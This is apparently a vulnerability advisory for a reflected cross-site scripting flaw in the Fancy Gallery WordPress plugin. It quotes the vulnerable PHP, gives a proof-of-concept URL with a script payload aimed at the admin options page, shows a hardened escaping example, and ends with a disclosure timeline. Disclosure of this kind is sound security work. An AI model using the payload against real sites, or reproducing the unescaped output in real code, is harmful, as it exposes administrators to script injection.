$_GET['delete'] is not escaped.
File: fancy-gallery\class.options.php
  public function Load_Options_Page(){
    # Check if the user tries to delete a template
    If (IsSet($_GET['delete']) && $this->core->Get_Template_Properties ($_GET['delete'])){ # You can only delete Fancy Gallery Templates!
      Unlink($_GET['delete']);
      WP_Redirect( $this->Get_Options_Page_Url(Array('template_deleted' => 'true')) );
    }
    ElseIf (IsSet($_GET['delete'])){
      # The raw query parameter is concatenated into the message and printed by WP_Die without escaping
      WP_Die($this->t('Error while deleting: ' . $_GET['delete']));
    }
  }
  private function t($text, $context = False){
    return $this->core->t($text, $context);
  }
File: fancy-gallery\class.core.php
  public function t($text, $content = False){
    return $this->i18n->t($text, $content);
  }
File: fancy-gallery\class.i18n.php
  public function t ($text, $context = Null){
    # Translates the string $text with context $context
    If (Empty($context))
      return Translate ($text, __CLASS__);
    Else
      return Translate_With_GetText_Context ($text, $context, __CLASS__);
  }
Proof of Concept
The injected script is rendered in the administrator's browser when the following URL is opened:
http://wordpress-url/wp-admin/options-general.php?page=WordPress/Plugin/Fancy_Gallery/Options&delete=<script>alert(String.fromCharCode(88,83,83,50));</script>
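Added example (not the plugin's code and not the vendor's 1.5.13 fix): the vulnerable error-message construction beside a hardened version that escapes the untrusted value at output time. It assumes the WordPress helpers esc_html() and wp_die(); the function_exists() fallbacks only let the snippet run outside WordPress.

```php
<?php
// Fallbacks so the example runs outside WordPress; inside WordPress the
// real esc_html() and wp_die() are used instead.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('wp_die')) {
    function wp_die($message) { echo $message, PHP_EOL; }
}

// Vulnerable pattern from class.options.php: the raw query parameter is
// concatenated into the message, passed through the translation layer
// (which does nothing for an unknown string) and printed as HTML.
function build_error_vulnerable($delete) {
    return 'Error while deleting: ' . $delete;
}

// Hardened pattern: keep the untrusted value out of the translated string
// and HTML-escape it at the point of output, so <, > and quotes become
// entities and no script element can be formed.
function build_error_hardened($delete) {
    return 'Error while deleting: ' . esc_html($delete);
}

// Constructed input mirroring the proof-of-concept URL above.
$payload = '<script>alert(String.fromCharCode(88,83,83,50));</script>';

wp_die(build_error_vulnerable($payload)); // script tag reaches the page intact
wp_die(build_error_hardened($payload));   // rendered as literal text, not executed
```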
Timeline
- 13-11-2014: Discovered
- 13-11-2014: Vendor notified
- 16-11-2014: Version 1.5.13 released, issue resolved